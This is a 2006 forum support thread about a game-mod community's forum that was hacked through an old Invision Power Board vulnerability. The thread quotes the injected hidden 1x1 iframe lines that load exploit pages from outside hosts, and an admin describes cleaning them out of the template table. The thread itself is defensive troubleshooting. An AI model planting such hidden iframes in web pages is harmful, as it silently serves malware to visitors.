Jump to content


Photo

Help Please - Forum Trouble - Legacy of War


  • Please log in to reply
12 replies to this topic

#1 Juggernaut1985

Juggernaut1985
  • Project Team
  • 92 posts

Posted 13 May 2006 - 12:53 PM

This just started this morning but when I go to the Legacy of War Forum my anti-virus pops up and said its detected and deleted all these WMF exploits, thus saving me but the question remains.

I haven't had this problem ever before, and looking at the forum in IE, it says there is an error on the page(the little yellow triangle down in the lower left in IE), but there is no such error. I even reloaded the forum files, from an older backup, and it still has the same problem.

I haven't been to any "bad" places recently, so I don't know what the hell is going on.

Also just now I was looking and for some reason its loading somehting like "traffmoney1.biz/....." or somehting like that, which makes me think someone has included a script of some sort. I have attached a screen of what the address was.

And here is the exact line of code its using to include this. But it only shows up after I have loaded the page, its not anywhere I can see on the index page itself when I get the index page from the ftp.

<iframe src="http://traffmoney1.biz/dl/adv606.php" width=1 height=1></iframe>

I don't know how to fix this problem, please help.

Attached Thumbnails

  • abcd.JPG

Edited by Juggernaut1985, 13 May 2006 - 01:15 PM.

Leader of Star Wars: Legacy of War - a mod for Empire at War
Posted Image

#2 Banshee

Banshee

    One Vision, One Purpose!

  • Network Admins
  • 9,045 posts
  • Location:Rio De Janeiro, RJ, Brazil.
  • Projects:PPM, PPM: Final Dawn, OS SHP Builder, OS Palette Editor, OS W3D Viewer, VXLSE III, etc...
  •  Retired Network Leader
  • Division:Revora
  • Job:Maintenance Admin

Posted 13 May 2006 - 01:16 PM

Your forum was hacked by some kind of bot. IPB 1.3.1 is full of vulnerabilities. I'll try to sort it now, but keep in mind that this kind of thing can return anytime..


Firefox is imune to this problem. So, while it's not fixed, recommend all your users to use Firefox.
Project Perfect Mod

Command & Conquer Mods, Mods Support, Public Researchs, Map Archives, Tutorials, Tools, A Friendly Community and much more. Check it out now!

Posted Image

#3 Juggernaut1985

Juggernaut1985
  • Project Team
  • 92 posts

Posted 13 May 2006 - 01:24 PM

Well if you find out how to fix it, let me know.
Leader of Star Wars: Legacy of War - a mod for Empire at War
Posted Image

#4 Banshee

Banshee

    One Vision, One Purpose!

  • Network Admins
  • 9,045 posts
  • Location:Rio De Janeiro, RJ, Brazil.
  • Projects:PPM, PPM: Final Dawn, OS SHP Builder, OS Palette Editor, OS W3D Viewer, VXLSE III, etc...
  •  Retired Network Leader
  • Division:Revora
  • Job:Maintenance Admin

Posted 13 May 2006 - 02:03 PM

You can already re-enable the forum. I've sorted it.


The hacker or bot violated your mysql by adding his code on all your templates at the table ibf_templates.
Project Perfect Mod

Command & Conquer Mods, Mods Support, Public Researchs, Map Archives, Tutorials, Tools, A Friendly Community and much more. Check it out now!

Posted Image

#5 Juggernaut1985

Juggernaut1985
  • Project Team
  • 92 posts

Posted 13 May 2006 - 09:41 PM

Thank you for fixing this.
Leader of Star Wars: Legacy of War - a mod for Empire at War
Posted Image

#6 Banshee

Banshee

    One Vision, One Purpose!

  • Network Admins
  • 9,045 posts
  • Location:Rio De Janeiro, RJ, Brazil.
  • Projects:PPM, PPM: Final Dawn, OS SHP Builder, OS Palette Editor, OS W3D Viewer, VXLSE III, etc...
  •  Retired Network Leader
  • Division:Revora
  • Job:Maintenance Admin

Posted 13 May 2006 - 10:01 PM

You're welcome ;).
Project Perfect Mod

Command & Conquer Mods, Mods Support, Public Researchs, Map Archives, Tutorials, Tools, A Friendly Community and much more. Check it out now!

Posted Image

#7 Juggernaut1985

Juggernaut1985
  • Project Team
  • 92 posts

Posted 21 May 2006 - 08:35 PM

Happened again, this time with this code:

<iframe src="http://traffsale1.biz/dl/adv704.php" width=1 height=1></iframe>

Can we block any IPs coming from this place?

Edited by Juggernaut1985, 21 May 2006 - 08:36 PM.

Leader of Star Wars: Legacy of War - a mod for Empire at War
Posted Image

#8 Banshee

Banshee

    One Vision, One Purpose!

  • Network Admins
  • 9,045 posts
  • Location:Rio De Janeiro, RJ, Brazil.
  • Projects:PPM, PPM: Final Dawn, OS SHP Builder, OS Palette Editor, OS W3D Viewer, VXLSE III, etc...
  •  Retired Network Leader
  • Division:Revora
  • Job:Maintenance Admin

Posted 21 May 2006 - 10:10 PM

You can, but I don't think it will solve the problem. These spyware can use infected machines from normal users to hijack your board or someone else's board... so, in this case, your ban will be worthless.

The best solution is to switch to another forum software. phpBB or MyBB are interesting free options... or either a paid IPB.

I've fixed the problem again.
Project Perfect Mod

Command & Conquer Mods, Mods Support, Public Researchs, Map Archives, Tutorials, Tools, A Friendly Community and much more. Check it out now!

Posted Image

#9 AdmiralGT

AdmiralGT

    title available

  • Members
  • 1,702 posts
  • Location:Bristol, UK
  • Projects:Petrolution

Posted 21 May 2006 - 10:14 PM

Or move the forums to the Revora forums ;)

#10 Juggernaut1985

Juggernaut1985
  • Project Team
  • 92 posts

Posted 21 May 2006 - 11:35 PM

Not going to happen GT. We value independence and the space afforded by such independence. On the plus side however, Petrolution will be getting alot of hits once we put the SSD up for download on there. I'll PM you when we have it ready to go.

-edit- Its still there. I'm scanning my comp now. Hope its not me thats doing it.

Edited by Juggernaut1985, 21 May 2006 - 11:39 PM.

Leader of Star Wars: Legacy of War - a mod for Empire at War
Posted Image

#11 Banshee

Banshee

    One Vision, One Purpose!

  • Network Admins
  • 9,045 posts
  • Location:Rio De Janeiro, RJ, Brazil.
  • Projects:PPM, PPM: Final Dawn, OS SHP Builder, OS Palette Editor, OS W3D Viewer, VXLSE III, etc...
  •  Retired Network Leader
  • Division:Revora
  • Job:Maintenance Admin

Posted 21 May 2006 - 11:50 PM

I've found the suspect code, right after the <body>:

<iframe src="http://traffsale1.biz/dl/adv704.php" width=1 height=1></iframe>

I'll clean it now...

Bump: Problem sorted, definitelly... no more sign of iframes on your board.
Project Perfect Mod

Command & Conquer Mods, Mods Support, Public Researchs, Map Archives, Tutorials, Tools, A Friendly Community and much more. Check it out now!

Posted Image

#12 Juggernaut1985

Juggernaut1985
  • Project Team
  • 92 posts

Posted 21 May 2006 - 11:59 PM

I've found the suspect code, right after the <body>:

<iframe src="http://traffsale1.biz/dl/adv704.php" width=1 height=1></iframe>

I'll clean it now...

Bump: Problem sorted, definitelly... no more sign of iframes on your board.


Thank you.

Are you sure we can't completely block the source of this attack? I mean if its one of my co-leaders or somehting I'd like to inform them, and if its me I'd like to know. We need to do somehting about this.

Can you trace the IP of the attacker?
Leader of Star Wars: Legacy of War - a mod for Empire at War
Posted Image

#13 Banshee

Banshee

    One Vision, One Purpose!

  • Network Admins
  • 9,045 posts
  • Location:Rio De Janeiro, RJ, Brazil.
  • Projects:PPM, PPM: Final Dawn, OS SHP Builder, OS Palette Editor, OS W3D Viewer, VXLSE III, etc...
  •  Retired Network Leader
  • Division:Revora
  • Job:Maintenance Admin

Posted 22 May 2006 - 12:39 AM

This is an exploit of IPB 1.3 Trial. Any zombie machine owned by anyone in the world can put it back.

And I can't trace the IP of the attacker, because the log file of gamemod is some gigabytes...
Project Perfect Mod

Command & Conquer Mods, Mods Support, Public Researchs, Map Archives, Tutorials, Tools, A Friendly Community and much more. Check it out now!

Posted Image




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users